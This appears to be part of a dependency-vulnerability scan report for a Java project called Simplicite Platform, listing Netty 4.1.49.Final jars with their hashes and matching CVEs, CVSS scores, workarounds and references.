Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
netty-common-4.1.49.Final.jar (shaded: org.jctools:jctools-core:3.0.0)Description:
Java Concurrency Tools Core Library License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/io/netty/netty-common/4.1.49.Final/netty-common-4.1.49.Final.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: 095b6221b2a65322d08458d37fa574d2
SHA1: ad6ba95498dc140e8d8c7b4c1348f73be69205c9
SHA256: 87c10bb67da5c9894623829c24d8290edcd429979ebe568d97009ee3eca9d6c1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid jctools-core Low Vendor pom groupid org.jctools Highest Vendor pom name Java Concurrency Tools Core Library High Vendor pom url JCTools Highest Product pom artifactid jctools-core Highest Product pom groupid org.jctools Highest Product pom name Java Concurrency Tools Core Library High Product pom url JCTools High Version pom version 3.0.0 Highest
netty-transport-4.1.49.Final.jarDescription:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients. License:
http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/io/netty/netty-transport/4.1.49.Final/netty-transport-4.1.49.Final.jar
MD5: f94308ae6129d24af529effbf3fc4cab
SHA1: 415ea7f326635743aec952fe2349ca45959e94a7
SHA256: 94e95c5d2b3372806e25c574bb2f51e92eb2e84ff9ae0738789f0aa0a34fb036
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name netty-transport High Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.transport Medium Vendor Manifest bundle-docurl https://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.transport Medium Vendor Manifest implementation-url https://netty.io/netty-transport/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid netty-transport Highest Vendor pom artifactid netty-transport Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Transport High Vendor pom parent-artifactid netty-parent Low Product file name netty-transport High Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.transport Medium Product Manifest bundle-docurl https://netty.io/ Low Product Manifest Bundle-Name Netty/Transport Medium Product Manifest bundle-symbolicname io.netty.transport Medium Product Manifest Implementation-Title Netty/Transport High Product Manifest implementation-url https://netty.io/netty-transport/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid netty-transport Highest Product pom groupid io.netty Highest Product pom name Netty/Transport High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.49.Final High Version Manifest Implementation-Version 4.1.49.Final High Version pom version 4.1.49.Final Highest
Related Dependencies netty-buffer-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-buffer/4.1.49.Final/netty-buffer-4.1.49.Final.jar MD5: 9fc5e68873d85b70014f92b044800391 SHA1: 8e819a81bca88d1e88137336f64531a53db0a4ad SHA256: c094bc15ba5f8753f4f23dc2bb892baccc4b83cb5a5bdb3743a4c1cefb6e7ca0 pkg:maven/io.netty/netty-buffer@4.1.49.Final netty-codec-http-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-codec-http/4.1.49.Final/netty-codec-http-4.1.49.Final.jar MD5: 805c96e7cf690771211fa1ca2220f749 SHA1: 4f30dbc462b26c588dffc0eb7552caef1a0f549e SHA256: 7cc428b29f6b7d8999739f2405674213c0329c70f10f6829681386aae472f125 pkg:maven/io.netty/netty-codec-http@4.1.49.Final netty-codec-http2-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-codec-http2/4.1.49.Final/netty-codec-http2-4.1.49.Final.jar MD5: 1c702f405bdd81de6e0ba40947ab5fe1 SHA1: ca35293757f80cd2460c80791757db261615dbe7 SHA256: 7e714f4ff00138ec6ce28d299f56949e960269c161a7c30e1c1fc55c24ca277f pkg:maven/io.netty/netty-codec-http2@4.1.49.Final netty-codec-redis-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-codec-redis/4.1.49.Final/netty-codec-redis-4.1.49.Final.jar MD5: abf862c30069f6bef0cfc462f4627b80 SHA1: 240e32a361d2b6eb76c2f94b5c488e7d07bf8b3c SHA256: e27cc257d2aea3665c61f90bbd3b1d14efe05e308be2aeeb80424d7b61082f35 pkg:maven/io.netty/netty-codec-redis@4.1.49.Final netty-common-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-common/4.1.49.Final/netty-common-4.1.49.Final.jar MD5: f166a56cdb7a25033cf04267fc12f682 SHA1: 927c8563a1662d869b145e70ce82ad89100f2c90 SHA256: f6ca24d6cd374014284a9e66bcbc9ce794592d347b3ac9b25355baaf6af9defc pkg:maven/io.netty/netty-common@4.1.49.Final netty-handler-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-handler/4.1.49.Final/netty-handler-4.1.49.Final.jar MD5: 4d4255fb92d963d50da2b8d87dcb3071 SHA1: c73443adb9d085d5dc2d5b7f3bdd91d5963976f7 SHA256: 8998e5d12a546f6b3d1a6021ad482f4a6670017a4cd8e8c65032b93442b1c85e pkg:maven/io.netty/netty-handler@4.1.49.Final netty-resolver-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-resolver/4.1.49.Final/netty-resolver-4.1.49.Final.jar MD5: df4d20ac7435cace6af398a0276aeaab SHA1: eb81e1f0eaa99e75983bf3d28cae2b103e0f3a34 SHA256: 400b729020981e8f572720a70591925ae27d52949b96c02f374c6d39446b4795 pkg:maven/io.netty/netty-resolver@4.1.49.Final netty-transport-native-epoll-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-transport-native-epoll/4.1.49.Final/netty-transport-native-epoll-4.1.49.Final.jar MD5: 6620053db25b8fb1e3f8cca9e8148cd8 SHA1: a6055557f948034684884e7b3482b17b65e1c642 SHA256: e59fe159f2768da687ccd61d9a5ca96b23371adc7069bf294b62172d72e76a17 pkg:maven/io.netty/netty-transport-native-epoll@4.1.49.Final netty-transport-native-kqueue-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-transport-native-kqueue/4.1.49.Final/netty-transport-native-kqueue-4.1.49.Final.jar MD5: d05a08f8218887d77aa0c0d8249f0597 SHA1: be85a89f5895c7d7f75cd78daa4fda23fb20d622 SHA256: 36e1d61a12472677d592869507f2aaf4b79acbc8a3d895d1358f20fb1a8e393e pkg:maven/io.netty/netty-transport-native-kqueue@4.1.49.Final netty-transport-native-unix-common-4.1.49.Final.jarFile Path: /var/simplicite/.m2/repository/io/netty/netty-transport-native-unix-common/4.1.49.Final/netty-transport-native-unix-common-4.1.49.Final.jar MD5: 65893d97dfa86192b4069f3242f486f2 SHA1: a2a70601dd24dfdb533ac307955b55fa9f52aca1 SHA256: f0ca5fcbe868d1bd1526d4228c0e7d94c4cdc2502310dca680b8a48f2ab921f5 pkg:maven/io.netty/netty-transport-native-unix-common@4.1.49.Final CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022 - [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final - [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0 - [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
